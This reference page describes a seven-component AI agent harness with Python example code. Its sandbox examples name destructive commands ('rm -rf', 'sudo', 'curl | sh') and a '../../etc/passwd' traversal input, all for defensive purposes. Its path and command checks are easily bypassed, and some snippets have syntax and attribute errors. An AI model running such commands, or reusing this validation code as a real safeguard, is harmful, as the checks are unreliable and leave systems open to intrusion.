Skip to main content
Reference

Harness Architecture: Seven Components

The seven components of a complete AI agent harness — LLM, tools, memory, planning loop, sandbox, orchestration, state — with architecture diagrams and pattern implementations.

What Is a Harness?

A harness is the complete architectural system surrounding an LLM that manages the lifecycle of context—from intent capture through specification, compilation, execution, verification, and persistence.

In simple terms: Everything except the model.

Architecture Overview

                          ┌─────────────────────────────┐
                          │        User / Caller         │
                          └──────────────┬──────────────┘
                                         │ intent

┌────────────────────────────────────────────────────────────────────────────┐
│                      7. ORCHESTRATION LAYER                               │
│  ┌──────────────────────────────────────────────────────────────────────┐  │
│  │  Session lifecycle · Retry logic · Error recovery · Agent init      │  │
│  └──────────────────────┬───────────────────────────────┬──────────────┘  │
│                         │                               │                 │
│           ┌─────────────▼─────────────┐   ┌─────────────▼──────────────┐  │
│           │  4. PLANNING LOOP         │   │  3. MEMORY MANAGEMENT      │  │
│           │  ┌─────────────────────┐  │   │  ┌──────────────────────┐  │  │
│           │  │ Perceive → Reason → │  │   │  │ Short-term (session) │  │  │
│           │  │ Plan → Act → Observe│  │◄─►│  │ Working (task)       │  │  │
│           │  └──────────┬──────────┘  │   │  │ Long-term (project)  │  │  │
│           │             │             │   │  │ Auto-consolidation   │  │  │
│           └─────────────┼─────────────┘   │  └──────────────────────┘  │  │
│                         │ tool calls      └────────────────────────────┘  │
│           ┌─────────────▼─────────────┐                                   │
│           │  5. SANDBOXING &          │                                   │
│           │     VALIDATION            │                                   │
│           │  Permission checks        │                                   │
│           │  Input sanitization       │                                   │
│           │  Audit logging            │                                   │
│           └─────────────┬─────────────┘                                   │
│                         │ validated calls                                 │
│           ┌─────────────▼─────────────┐   ┌────────────────────────────┐  │
│           │  2. TOOL INTEGRATION      │   │  1. LLM / AI MODEL        │  │
│           │  File ops · Code exec     │   │  Reasoning engine          │  │
│           │  Web search · APIs        │◄─►│  SLM for loops (7B-13B)   │  │
│           │  Browser · Image gen      │   │  LLM for verify (70B+)    │  │
│           └─────────────┬─────────────┘   └────────────────────────────┘  │
│                         │ results                                         │
│           ┌─────────────▼─────────────┐                                   │
│           │  6. FILESYSTEM &          │                                   │
│           │     PERSISTENCE           │                                   │
│           │  Workspace · State files  │                                   │
│           │  Session history · Git    │                                   │
│           └───────────────────────────┘                                   │
└────────────────────────────────────────────────────────────────────────────┘

Data Flow

  1. User submits intent to the Orchestration Layer
  2. Orchestration initializes the session and loads Memory
  3. The Planning Loop receives the intent plus loaded context
  4. The loop calls the LLM for reasoning, receives a proposed action
  5. Proposed tool calls pass through Sandboxing & Validation
  6. Validated calls reach the Tool Integration Layer for execution
  7. Tool results flow back through the loop; the LLM observes outcomes
  8. State changes persist to the Filesystem & Persistence layer
  9. The loop repeats until the task is complete or max iterations hit
  10. Orchestration ends the session, triggers memory consolidation

Core Components: Seven Essential Pieces

A production harness consists of these seven components:

1. LLM/AI Model

The reasoning engine. Can be swapped:

  • Claude (Anthropic) — best reasoning, safe defaults
  • GPT-4 (OpenAI) — capable, multimodal
  • Llama 3 (Meta) — open-source, can run locally
  • Mistral (Mistral AI) — efficient 7B option
  • Phi-4 (Microsoft) — optimized for specific tasks

Consideration for harnesses: Use SLM (7B-13B) for agentic loops, LLM (70B+) for verification steps.

Interface

from abc import ABC, abstractmethod
from dataclasses import dataclass

@dataclass
class Message:
    role: str          # "system", "user", "assistant", "tool"
    content: str
    tool_calls: list | None = None
    tool_call_id: str | None = None

@dataclass
class LLMResponse:
    content: str
    tool_calls: list
    usage: dict        # {"input_tokens": int, "output_tokens": int}
    stop_reason: str   # "end_turn", "tool_use", "max_tokens"

class LLMProvider(ABC):
    @abstractmethod
    async def complete(
        self,
        messages: list[Message],
        tools: list[dict],
        temperature: float = 0.0,
        max_tokens: int = 4096,
    ) -> LLMResponse:
        """Send messages to the model and get a response."""
        ...

    @abstractmethod
    def count_tokens(self, messages: list[Message]) -> int:
        """Count tokens for context budget management."""
        ...

Common Implementation Patterns

Multi-provider routing — Use a fast, cheap model for simple decisions (classify intent, extract parameters) and a powerful model for complex reasoning (planning, code generation, verification):

class HybridRouter:
    def __init__(self, fast: LLMProvider, powerful: LLMProvider):
        self.fast = fast
        self.powerful = powerful

    async def route(self, messages: list[Message], tools: list[dict]) -> LLMResponse:
        # Classify complexity with the fast model
        classification = await self.fast.complete(
            messages=[Message(role="user", content=f"Is this simple or complex? {messages[-1].content}")],
            tools=[],
        )
        if "simple" in classification.content.lower():
            return await self.fast.complete(messages, tools)
        return await self.powerful.complete(messages, tools)

Retry with fallback — If the primary provider is down, fall back to the secondary:

class FallbackProvider(LLMProvider):
    def __init__(self, primary: LLMProvider, fallback: LLMProvider):
        self.primary = primary
        self.fallback = fallback

    async def complete(self, messages, tools, **kwargs) -> LLMResponse:
        try:
            return await self.primary.complete(messages, tools, **kwargs)
        except (RateLimitError, ServiceUnavailableError):
            logger.warning("Primary LLM unavailable, falling back")
            return await self.fallback.complete(messages, tools, **kwargs)

What Happens When This Component Fails

  • Rate limit: Harness must implement exponential backoff. Without it, the entire loop stalls.
  • Context overflow: The model returns a truncated or incoherent response. The harness must trim older messages before retrying.
  • Model hallucination: The model invents tool names or malformed arguments. Sandboxing catches this, but the loop must handle the rejection gracefully (re-prompt with the error).
  • Provider outage: Without a fallback provider, the harness is completely dead. Always have a secondary.

2. Tool Integration Layer

Connects model to external capabilities:

  • Web search (access to current information)
  • Code execution (run and test code)
  • File operations (read, write, create)
  • APIs (database, external services)
  • Image generation (create assets)
  • Browser automation (interact with web)

Critical: Each tool must have:

  • Clear input/output schema
  • Validation (prevent unsafe operations)
  • Error handling (graceful failures)
  • Logging (understand what happened)

Interface

from dataclasses import dataclass
from typing import Any

@dataclass
class ToolDefinition:
    name: str
    description: str
    input_schema: dict       # JSON Schema for parameters
    requires_approval: bool  # True for destructive operations

@dataclass
class ToolResult:
    tool_call_id: str
    output: str
    error: str | None = None
    is_error: bool = False

class Tool(ABC):
    @abstractmethod
    def definition(self) -> ToolDefinition:
        """Return the tool's schema for the LLM."""
        ...

    @abstractmethod
    async def execute(self, arguments: dict[str, Any]) -> ToolResult:
        """Execute the tool with validated arguments."""
        ...

Common Implementation Patterns

File-based tool registry — Each tool is a separate module discovered at startup:

import importlib
import os

class ToolRegistry:
    def __init__(self):
        self._tools: dict[str, Tool] = {}

    def discover(self, tools_dir: str) -> None:
        """Load all tool modules from a directory."""
        for filename in os.listdir(tools_dir):
            if filename.endswith(".py") and not filename.startswith("_"):
                module_name = filename[:-3]
                module = importlib.import_module(f"tools.{module_name}")
                tool_class = getattr(module, "TOOL_CLASS")
                tool = tool_class()
                self._tools[tool.definition().name] = tool

    def get(self, name: str) -> Tool | None:
        return self._tools.get(name)

    def all_definitions(self) -> list[ToolDefinition]:
        return [t.definition() for t in self._tools.values()]

Concrete tool example — A file-read tool with validation:

class ReadFileTool(Tool):
    ALLOWED_DIRS = ["/workspace", "/tmp"]

    def definition(self) -> ToolDefinition:
        return ToolDefinition(
            name="read_file",
            description="Read the contents of a file at the given path.",
            input_schema={
                "type": "object",
                "properties": {
                    "path": {"type": "string", "description": "Absolute file path"},
                },
                "required": ["path"],
            },
            requires_approval=False,
        )

    async def execute(self, arguments: dict) -> ToolResult:
        path = arguments["path"]
        # Validate path is within allowed directories
        if not any(path.startswith(d) for d in self.ALLOWED_DIRS):
            return ToolResult(
                tool_call_id="",
                output="",
                error=f"Access denied: {path} is outside allowed directories",
                is_error=True,
            )
        try:
            with open(path, "r") as f:
                content = f.read()
            return ToolResult(tool_call_id="", output=content)
        except FileNotFoundError:
            return ToolResult(tool_call_id="", output="", error=f"File not found: {path}", is_error=True)

What Happens When This Component Fails

  • Tool not found: The LLM requests a tool that does not exist. The registry returns an error message, and the loop re-prompts. Without this, the loop hangs or crashes.
  • Tool timeout: A code-execution tool runs forever. Always set timeouts (asyncio.wait_for with a deadline). Kill the subprocess after the timeout.
  • Tool returns garbage: The LLM cannot parse the result. Return structured output (JSON or clear text), never raw binary or unstructured dumps.
  • Tool side effects: A destructive tool (file write, API call) partially completes then fails. Implement idempotent operations where possible, and log the partial state so recovery is possible.

3. Memory Management System

Four-layer architecture:

  • Short-term: Conversation context (this session)
  • Working: Intermediate state during loops (one feature)
  • Long-term: Persistent learnings (project lifetime)
  • Auto-consolidation: Automatic cleanup between sessions

See 04_memory_systems.md for detailed patterns.

Interface

@dataclass
class MemoryEntry:
    key: str
    content: str
    layer: str         # "short_term", "working", "long_term"
    created_at: float
    expires_at: float | None = None
    token_count: int = 0

class MemoryManager(ABC):
    @abstractmethod
    async def load(self, layer: str) -> list[MemoryEntry]:
        """Load all entries from a memory layer."""
        ...

    @abstractmethod
    async def store(self, entry: MemoryEntry) -> None:
        """Store an entry in the appropriate layer."""
        ...

    @abstractmethod
    async def consolidate(self) -> None:
        """Run auto-dream: merge, deduplicate, trim expired entries."""
        ...

    @abstractmethod
    def token_budget(self, layer: str) -> int:
        """Return the max token budget for this layer."""
        ...

Common Implementation Patterns

File-backed memory with token budgets:

class FileMemoryManager(MemoryManager):
    BUDGETS = {
        "short_term": 50_000,   # Current conversation
        "working": 10_000,      # Current task scratchpad
        "long_term": 5_000,     # Loaded at startup from MEMORY.md
    }

    def __init__(self, workspace: str):
        self.workspace = workspace
        self._entries: dict[str, list[MemoryEntry]] = {
            "short_term": [],
            "working": [],
            "long_term": [],
        }

    async def load(self, layer: str) -> list[MemoryEntry]:
        if layer == "long_term":
            memory_file = os.path.join(self.workspace, "MEMORY.md")
            if os.path.exists(memory_file):
                with open(memory_file) as f:
                    content = f.read()
                self._entries["long_term"] = [
                    MemoryEntry(key="project_memory", content=content,
                                layer="long_term", created_at=time.time())
                ]
        return self._entries.get(layer, [])

    async def consolidate(self) -> None:
        """Merge overlapping entries, remove expired, enforce budgets."""
        for layer, budget in self.BUDGETS.items():
            entries = self._entries[layer]
            # Remove expired
            now = time.time()
            entries = [e for e in entries if e.expires_at is None or e.expires_at > now]
            # Trim to budget (keep most recent)
            total = sum(e.token_count for e in entries)
            while total > budget and entries:
                removed = entries.pop(0)
                total -= removed.token_count
            self._entries[layer] = entries

What Happens When This Component Fails

  • Memory grows unbounded: Without consolidation, the conversation history fills the context window. The LLM starts producing degraded output or the API returns a context-length error. This is the most common memory failure.
  • Stale memory loaded: Long-term memory contains outdated facts that contradict current state. The LLM makes wrong decisions based on old information. Consolidation must timestamp and expire entries.
  • Memory file corrupted: A crash during write leaves MEMORY.md in a partial state. Always write to a temp file then atomically rename.
  • Working memory not cleared: State from task A leaks into task B. Clear working memory at task boundaries.

4. Planning Loop (Agentic Loop)

Standardized cycle that repeats until task completion:

  1. Perceive: Understand current state, user intent
  2. Reason: What should I do next?
  3. Plan: Decide on action(s)
  4. Act: Execute (call tools, write files)
  5. Observe: What happened? Did it work?

See 05_ai_agents.md for framework options (ReAct, ToT, etc.).

Interface

@dataclass
class LoopState:
    iteration: int
    max_iterations: int
    messages: list[Message]
    task_complete: bool = False
    error_count: int = 0

class AgentLoop(ABC):
    @abstractmethod
    async def run(self, initial_intent: str) -> str:
        """Run the full agentic loop until completion or max iterations."""
        ...

    @abstractmethod
    async def step(self, state: LoopState) -> LoopState:
        """Execute a single iteration of the loop."""
        ...

Common Implementation Patterns

ReAct loop with tool dispatch:

class ReActLoop(AgentLoop):
    def __init__(self, llm: LLMProvider, tools: ToolRegistry,
                 memory: MemoryManager, sandbox: Sandbox, max_iterations: int = 25):
        self.llm = llm
        self.tools = tools
        self.memory = memory
        self.sandbox = sandbox
        self.max_iterations = max_iterations

    async def run(self, initial_intent: str) -> str:
        state = LoopState(
            iteration=0,
            max_iterations=self.max_iterations,
            messages=[
                Message(role="system", content=self._build_system_prompt()),
                Message(role="user", content=initial_intent),
            ],
        )
        while not state.task_complete and state.iteration < state.max_iterations:
            state = await self.step(state)
            state.iteration += 1

        if not state.task_complete:
            logger.warning(f"Loop hit max iterations ({self.max_iterations})")
        return state.messages[-1].content

    async def step(self, state: LoopState) -> LoopState:
        # 1. Call LLM with current messages and available tools
        response = await self.llm.complete(
            messages=state.messages,
            tools=[t.dict() for t in self.tools.all_definitions()],
        )

        # 2. If LLM wants to use tools, execute them
        if response.tool_calls:
            state.messages.append(Message(
                role="assistant", content=response.content,
                tool_calls=response.tool_calls,
            ))
            for call in response.tool_calls:
                # Validate through sandbox
                if not self.sandbox.allow(call):
                    result = ToolResult(
                        tool_call_id=call["id"], output="",
                        error="Operation blocked by sandbox policy", is_error=True,
                    )
                else:
                    tool = self.tools.get(call["name"])
                    result = await tool.execute(call["arguments"])
                    result.tool_call_id = call["id"]
                state.messages.append(Message(
                    role="tool", content=result.output or result.error,
                    tool_call_id=result.tool_call_id,
                ))
        else:
            # No tool calls — LLM is done (or stuck)
            state.messages.append(Message(role="assistant", content=response.content))
            if response.stop_reason == "end_turn":
                state.task_complete = True

        return state

What Happens When This Component Fails

  • Infinite loop: The LLM keeps calling tools without making progress. The max-iteration guard is essential. Without it, you burn unlimited API credits.
  • Loop stuck on error: A tool returns an error, the LLM retries the same call identically. Implement a “same-call detector” that forces the LLM to try a different approach after 2-3 identical failures.
  • Context exhaustion mid-loop: The message history exceeds the context window. Implement sliding-window trimming: keep the system prompt, first user message, and last N messages; summarize the middle.
  • Planning paralysis: The LLM reasons extensively but never calls a tool. Set a “must act within 3 turns” rule in the system prompt.

5. Sandboxing & Validation

Safety and control:

  • Validates all tool calls before execution (prevent injection)
  • Prevents unsafe operations (file deletion, system calls)
  • Enforces permission boundaries (what tools can access)
  • Logs all actions for auditability and debugging

Interface

@dataclass
class SandboxPolicy:
    allowed_tools: set[str]
    allowed_paths: list[str]         # Filesystem paths the agent can access
    blocked_commands: list[str]      # Shell commands that are never allowed
    max_file_size_bytes: int         # Prevent writing huge files
    require_approval: set[str]       # Tools that need human confirmation
    network_allowed: bool            # Can tools make network requests?

class Sandbox:
    def __init__(self, policy: SandboxPolicy):
        self.policy = policy
        self._audit_log: list[dict] = []

    def allow(self, tool_call: dict) -> bool:
        """Check if a tool call is permitted under the current policy."""
        name = tool_call["name"]

        # Tool must exist in allowed set
        if name not in self.policy.allowed_tools:
            self._log("BLOCKED", name, "Tool not in allowed set")
            return False

        # Check path-based restrictions for file tools
        if "path" in tool_call.get("arguments", {}):
            path = tool_call["arguments"]["path"]
            if not any(path.startswith(p) for p in self.policy.allowed_paths):
                self._log("BLOCKED", name, f"Path {path} outside allowed dirs")
                return False

        # Check for blocked shell commands
        if name == "run_command":
            cmd = tool_call["arguments"].get("command", "")
            for blocked in self.policy.blocked_commands:
                if blocked in cmd:
                    self._log("BLOCKED", name, f"Command contains blocked: {blocked}")
                    return False

        self._log("ALLOWED", name, "Passed all checks")
        return True

    def _log(self, decision: str, tool: str, reason: str) -> None:
        self._audit_log.append({
            "timestamp": time.time(),
            "decision": decision,
            "tool": tool,
            "reason": reason,
        })

Common Implementation Patterns

Approval flow for destructive tools:

async def execute_with_approval(self, tool_call: dict, tool: Tool) -> ToolResult:
    defn = tool.definition()
    if defn.requires_approval:
        # In CLI: prompt the user; in API: send webhook
        approved = await self.request_human_approval(tool_call)
        if not approved:
            return ToolResult(
                tool_call_id=tool_call["id"], output="",
                error="User denied approval", is_error=True,
            )
    return await tool.execute(tool_call["arguments"])

What Happens When This Component Fails

  • No sandbox at all: The LLM can delete files, execute arbitrary shell commands, exfiltrate data. This is a security incident, not a bug.
  • Overly permissive policy: Allowing rm -rf / through a shell tool. Always maintain a blocklist of destructive commands.
  • Path traversal: The LLM sends ../../etc/passwd as a file path. Validate that resolved absolute paths (after symlink resolution) are within allowed directories.
  • Audit log lost: Without logs, you cannot debug what the agent did or prove compliance. Write audit logs to a separate file that the agent cannot modify.

6. Filesystem & Persistence

The foundational harness primitive:

  • Workspace: Project directory with structure (state, progress, sessions)
  • State files: Git commits, feature lists, progress tracking
  • Session history: Transcripts for auto-dream consolidation
  • Versioning: git enables rollback and history inspection
  • Multi-agent: Isolated workspaces for different agents

Interface

class WorkspaceManager:
    def __init__(self, root: str):
        self.root = root
        self.state_dir = os.path.join(root, ".harness")
        self.sessions_dir = os.path.join(self.state_dir, "sessions")

    def initialize(self) -> None:
        """Create workspace structure if it doesn't exist."""
        os.makedirs(self.state_dir, exist_ok=True)
        os.makedirs(self.sessions_dir, exist_ok=True)
        # Initialize git if not already a repo
        if not os.path.exists(os.path.join(self.root, ".git")):
            subprocess.run(["git", "init"], cwd=self.root, check=True)

    def save_session(self, session_id: str, messages: list[Message]) -> str:
        """Persist session transcript for later consolidation."""
        path = os.path.join(self.sessions_dir, f"{session_id}.json")
        with open(path, "w") as f:
            json.dump([asdict(m) for m in messages], f, indent=2)
        return path

    def load_state(self, key: str) -> dict | None:
        """Load a state file (feature list, progress, etc.)."""
        path = os.path.join(self.state_dir, f"{key}.json")
        if os.path.exists(path):
            with open(path) as f:
                return json.load(f)
        return None

    def save_state(self, key: str, data: dict) -> None:
        """Atomically save state (write tmp then rename)."""
        path = os.path.join(self.state_dir, f"{key}.json")
        tmp_path = path + ".tmp"
        with open(tmp_path, "w") as f:
            json.dump(data, f, indent=2)
        os.rename(tmp_path, path)  # Atomic on POSIX

What Happens When This Component Fails

  • No atomic writes: A crash during save_state corrupts the file. The harness cannot resume. Always write-then-rename.
  • No git history: Without commits, there is no rollback. A bad agent action permanently damages the workspace.
  • Session transcripts lost: Auto-dream cannot consolidate. Long-term memory degrades over time. Persist sessions immediately after each loop iteration, not just at session end.
  • Disk full: Unbounded session transcripts fill the disk. Implement rotation (keep last N sessions, archive or delete older ones).

7. Orchestration Layer

Coordinates the entire system:

  • Agent initialization: Set up environment, load memory
  • Session lifecycle: Begin, run loops, end, persist
  • Handoffs: Between phases (planning -> execution -> verification)
  • Retry logic: Recover from transient failures
  • Error recovery: Graceful degradation, fallbacks

Interface

class Harness:
    """Top-level orchestrator that wires all components together."""

    def __init__(
        self,
        llm: LLMProvider,
        tools: ToolRegistry,
        memory: MemoryManager,
        sandbox: Sandbox,
        workspace: WorkspaceManager,
        max_iterations: int = 25,
    ):
        self.llm = llm
        self.tools = tools
        self.memory = memory
        self.sandbox = sandbox
        self.workspace = workspace
        self.loop = ReActLoop(llm, tools, memory, sandbox, max_iterations)

    async def run_session(self, user_intent: str) -> str:
        """Execute a complete session from intent to result."""
        session_id = str(uuid.uuid4())
        logger.info(f"Session {session_id} starting")

        try:
            # 1. Initialize workspace
            self.workspace.initialize()

            # 2. Load memory layers
            await self.memory.load("long_term")
            await self.memory.load("working")

            # 3. Run the agentic loop
            result = await self.loop.run(user_intent)

            # 4. Persist session
            self.workspace.save_session(session_id, self.loop.messages)

            # 5. Consolidate memory
            await self.memory.consolidate()

            logger.info(f"Session {session_id} completed successfully")
            return result

        except Exception as e:
            logger.error(f"Session {session_id} failed: {e}")
            # Save partial state for debugging
            self.workspace.save_state("last_error", {
                "session_id": session_id,
                "error": str(e),
                "timestamp": time.time(),
            })
            raise

What Happens When This Component Fails

  • No error boundaries: A tool exception bubbles up and kills the entire harness. Every component interaction must be wrapped in try/except at the orchestration level.
  • No session persistence on crash: If the harness crashes mid-session, all progress is lost. Persist state after every loop iteration, not just at the end.
  • Retry without backoff: Retrying a failed LLM call immediately triggers another rate limit. Always use exponential backoff.
  • No graceful shutdown: Ctrl+C kills the process mid-write, corrupting state files. Handle SIGINT/SIGTERM to flush state before exiting.

Proven Harness Patterns

Pattern 1: Single-Agent Supervisor (Simplest)

┌──────────────────────────┐
│  User Intent             │
└────────┬─────────────────┘

┌──────────────────────────┐
│  Supervisor Agent        │
│  (Single LLM in loop)    │
└────────┬─────────────────┘

    ┌────┴─────────────┐
    ↓                  ↓
┌─────────┐      ┌──────────┐
│ Tools   │      │  Memory  │
└─────────┘      └──────────┘

┌──────────────────────────┐
│  Persistent State        │
│  (Files, git commits)    │
└──────────────────────────┘

Characteristics:

  • One model in a ReAct loop with tools, memory, verification
  • Harness manages: initialization, context injection, tool dispatch, state persistence
  • Works well for bounded, well-defined tasks

Use case: Claude Code, personal assistant agents, single-task workflows

Complete Working Example

import asyncio
import os

async def main():
    # --- Wire up all 7 components ---

    # 1. LLM
    llm = ClaudeProvider(api_key=os.environ["ANTHROPIC_API_KEY"], model="claude-sonnet-4"  # Note: model IDs include date suffixes that change with releases)

    # 2. Tools
    tools = ToolRegistry()
    tools.discover("./tools")  # Loads read_file, write_file, run_command, web_search

    # 3. Memory
    memory = FileMemoryManager(workspace="./project")

    # 4. Planning loop (created inside Harness)
    # 5. Sandbox
    sandbox = Sandbox(SandboxPolicy(
        allowed_tools={"read_file", "write_file", "run_command", "web_search"},
        allowed_paths=["./project", "/tmp"],
        blocked_commands=["rm -rf", "sudo", "curl | sh"],
        max_file_size_bytes=10 * 1024 * 1024,  # 10 MB
        require_approval={"run_command"},
        network_allowed=True,
    ))

    # 6. Workspace
    workspace = WorkspaceManager(root="./project")

    # 7. Orchestration
    harness = Harness(
        llm=llm, tools=tools, memory=memory,
        sandbox=sandbox, workspace=workspace,
        max_iterations=25,
    )

    # --- Run a session ---
    result = await harness.run_session(
        "Create a Python function that parses CSV files and returns summary statistics. "
        "Write tests. Commit when done."
    )
    print(result)

if __name__ == "__main__":
    asyncio.run(main())

Pattern 2: Initializer-Executor Split (Long-Running Tasks)

Session 1:
┌───────────────────────────────────┐
│ INITIALIZER PHASE (runs once)     │
│ - Set up durable environment      │
│ - Create feature list (JSON)      │
│ - Establish git repo              │
│ - Initialize progress file        │
└───────────────────────────────────┘

    Shared Environment (files)

Sessions 2-N:
┌───────────────────────────────────┐
│ EXECUTOR PHASE (repeated)         │
│ - Read shared environment         │
│ - Work on one feature at a time   │
│ - Self-verify via testing         │
│ - Commit with issue refs          │
│ - Update progress file            │
└───────────────────────────────────┘

Why split phases:

  • Initializer: Expensive setup once (creates structure, plans work)
  • Executor: Cheap, incremental work (make progress, commit, stop)
  • Shared memory: Environment files act as project state bridge across sessions

Characteristics:

  • Reduces context exhaustion (don’t replay setup each session)
  • Produces cleaner, testable code (one feature per commit)
  • Enables long-running projects (month+, agent keeps progressing)

Use case: Large feature implementation, refactoring, product development

Handoff Implementation

The key to this pattern is the shared state file that bridges sessions:

# --- Initializer Session ---

class InitializerHarness(Harness):
    """Runs once to plan work and create the shared environment."""

    SYSTEM_PROMPT = """You are a project initializer. Your job:
    1. Analyze the user's requirements
    2. Break them into discrete features (max 10)
    3. Create a feature_list.json with status tracking
    4. Set up the project structure (directories, configs)
    5. Initialize git with a first commit
    Do NOT implement any features. Only plan and structure."""

    async def run_session(self, user_intent: str) -> str:
        result = await super().run_session(user_intent)

        # Verify the handoff artifact exists
        feature_list = self.workspace.load_state("feature_list")
        if not feature_list:
            raise RuntimeError("Initializer failed to create feature_list.json")

        return result


# --- Executor Session ---

class ExecutorHarness(Harness):
    """Runs repeatedly, picking up the next incomplete feature each time."""

    SYSTEM_PROMPT = """You are a feature executor. Your job:
    1. Read feature_list.json — find the first feature with status "pending"
    2. Implement ONLY that one feature
    3. Write tests for it
    4. Run the tests — fix until they pass
    5. Commit with a descriptive message referencing the feature
    6. Update feature_list.json: set that feature's status to "complete"
    7. Stop. Do not start the next feature."""

    async def run_session(self, user_intent: str = "") -> str:
        # Load the feature list to find next work item
        feature_list = self.workspace.load_state("feature_list")
        if not feature_list:
            raise RuntimeError("No feature_list.json found. Run initializer first.")

        pending = [f for f in feature_list["features"] if f["status"] == "pending"]
        if not pending:
            return "All features complete!"

        next_feature = pending[0]
        intent = f"Implement feature: {next_feature['name']}\nDescription: {next_feature['description']}"

        return await super().run_session(intent)

The feature_list.json handoff file:

{
  "project": "csv-analyzer",
  "created": "2026-04-18T10:00:00Z",
  "features": [
    {
      "id": 1,
      "name": "CSV parser core",
      "description": "Parse CSV files with header detection and type inference",
      "status": "complete",
      "completed_at": "2026-04-18T10:15:00Z"
    },
    {
      "id": 2,
      "name": "Summary statistics",
      "description": "Calculate mean, median, mode, std dev for numeric columns",
      "status": "pending",
      "completed_at": null
    },
    {
      "id": 3,
      "name": "CLI interface",
      "description": "Command-line interface with argparse for file input and output format",
      "status": "pending",
      "completed_at": null
    }
  ]
}

Running the full lifecycle:

async def run_project(requirements: str):
    # Phase 1: Initialize (once)
    init_harness = InitializerHarness(llm=llm, tools=tools, ...)
    await init_harness.run_session(requirements)

    # Phase 2: Execute (repeated until done)
    while True:
        exec_harness = ExecutorHarness(llm=llm, tools=tools, ...)
        result = await exec_harness.run_session()
        if "All features complete" in result:
            break
        # Fresh harness each iteration = fresh context window

Pattern 3: Multi-Agent Coordinator (Specialized Teams)

                  User

          ┌─────────────────┐
          │  Coordinator    │
          │  Agent          │
          └────────┬────────┘
         ┌─────────┼─────────┐
         ↓         ↓         ↓
    ┌─────────┐┌──────────┐┌────────┐
    │Research ││Code Gen  ││Verify  │
    │Specialist││Specialist││Specialist│
    └─────────┘└──────────┘└────────┘
         ↓         ↓         ↓
    [Results combine → Final output]

Characteristics:

  • Multiple specialized agents with distinct roles
  • Central coordinator routes tasks
  • Each agent maintains isolation (workspace, memory, tools)
  • Agents can work in parallel

Use case: Complex business processes, multi-discipline projects, scaling

Coordinator and Specialist Implementation

@dataclass
class AgentSpec:
    name: str
    system_prompt: str
    tools: list[str]           # Tool names this agent can use
    allowed_paths: list[str]   # Filesystem access scope


class SpecialistAgent:
    """A single specialist with its own sandbox and tool set."""

    def __init__(self, spec: AgentSpec, llm: LLMProvider, registry: ToolRegistry):
        self.spec = spec
        # Each specialist gets a restricted tool set
        filtered_tools = ToolRegistry()
        for name in spec.tools:
            tool = registry.get(name)
            if tool:
                filtered_tools._tools[name] = tool

        self.harness = Harness(
            llm=llm,
            tools=filtered_tools,
            memory=FileMemoryManager(workspace=f"./agents/{spec.name}"),
            sandbox=Sandbox(SandboxPolicy(
                allowed_tools=set(spec.tools),
                allowed_paths=spec.allowed_paths,
                blocked_commands=["rm -rf", "sudo"],
                max_file_size_bytes=5 * 1024 * 1024,
                require_approval=set(),
                network_allowed="web_search" in spec.tools,
            )),
            workspace=WorkspaceManager(root=f"./agents/{spec.name}"),
        )

    async def execute(self, task: str) -> str:
        return await self.harness.run_session(task)


class CoordinatorAgent:
    """Routes tasks to specialists and combines their results."""

    SPECIALISTS = [
        AgentSpec(
            name="researcher",
            system_prompt="You research topics and return structured findings.",
            tools=["web_search", "read_file", "write_file"],
            allowed_paths=["./agents/researcher", "/tmp"],
        ),
        AgentSpec(
            name="coder",
            system_prompt="You write clean, tested Python code.",
            tools=["read_file", "write_file", "run_command"],
            allowed_paths=["./agents/coder", "./project", "/tmp"],
        ),
        AgentSpec(
            name="reviewer",
            system_prompt="You review code for bugs, security issues, and style.",
            tools=["read_file"],
            allowed_paths=["./agents/coder", "./project"],
        ),
    ]

    def __init__(self, llm: LLMProvider, registry: ToolRegistry):
        self.llm = llm
        self.agents = {
            spec.name: SpecialistAgent(spec, llm, registry)
            for spec in self.SPECIALISTS
        }

    async def run(self, user_intent: str) -> str:
        # Step 1: Coordinator decides which specialists to invoke and in what order
        plan = await self.llm.complete(
            messages=[
                Message(role="system", content=(
                    "You are a coordinator. Given a user request, produce a JSON plan. "
                    "Available specialists: researcher, coder, reviewer. "
                    "Output format: {\"steps\": [{\"agent\": \"name\", \"task\": \"description\"}]}"
                )),
                Message(role="user", content=user_intent),
            ],
            tools=[],
        )
        steps = json.loads(plan.content)["steps"]

        # Step 2: Execute steps (sequential — each may depend on prior output)
        context = ""
        for step in steps:
            agent = self.agents[step["agent"]]
            task_with_context = f"{step['task']}\n\nContext from previous steps:\n{context}"
            result = await agent.execute(task_with_context)
            context += f"\n--- {step['agent']} output ---\n{result}\n"

        # Step 3: Coordinator synthesizes final answer
        synthesis = await self.llm.complete(
            messages=[
                Message(role="system", content="Synthesize these specialist outputs into a final answer."),
                Message(role="user", content=context),
            ],
            tools=[],
        )
        return synthesis.content

Key design decisions in multi-agent:

  • Each specialist has its own workspace directory (./agents/<name>/)
  • Tool access is restricted per role (reviewer cannot write files)
  • Filesystem isolation prevents one agent from corrupting another’s state
  • The coordinator uses the LLM to plan, but does not execute tools itself

Best Practices for Effective Harnesses

1. Incremental Progress Over One-Shotting

  • Prompt agents to work on one feature at a time
  • Reduces context exhaustion (restart fresh from smaller checkpoints)
  • Produces cleaner, more testable code
  • Commits: Use feature-per-commit pattern

2. Verification Before Advancement

  • Require self-verification through actual testing (not code review)
  • Use browser automation or integration tests where applicable
  • Prevent marking features complete without validation
  • Pattern: Generate -> Test -> Fix loop (Reflexion style)

3. Clear State Management

  • Comprehensive progress documentation (feature list, completion status)
  • Git commits as checkpoints (can rollback, inspect history)
  • Feature lists: JSON or markdown with completion flags
  • Keep current across sessions (auto-dream updates)

4. Session Startup Protocol

Order matters — establish context in this sequence:

1. Load instructions (CLAUDE.md) — rules, conventions
2. Load memory index (MEMORY.md) — pointers to knowledge
3. Review current state
   - Feature/todo list (what's complete, what's next?)
   - Progress file (what did last session do?)
   - Recent commits (understand history)
4. Run basic functionality tests
   - Ensure project actually builds/runs
   - Verify no regressions from last session
5. Then proceed with new work

5. Context Management

  • Load only necessary memory at session start

    • Instructions: 5K tokens
    • Memory index: <1K tokens
    • Project state: 2-5K tokens
    • Total startup: <10K tokens (leaves 90%+ for work)
  • Keep index files under 200 lines

    • MEMORY.md stays compact
    • Move detailed notes to topic files
    • Load topic files on-demand, not at startup
  • Auto-dream consolidation (every 24h or 5 sessions)

    • Merge overlapping entries
    • Remove outdated/contradicted facts
    • Convert relative dates to absolute
    • Keep index under 200 lines

6. Error Recovery

  • Graceful degradation: Tools fail, agent continues
  • Retry logic: Some failures are transient
  • Backoff strategy: Exponential backoff for rate-limited APIs
  • Logging: Detailed logs for debugging
  • Clear error messages: So agent understands what failed and why

Common Architecture Mistakes

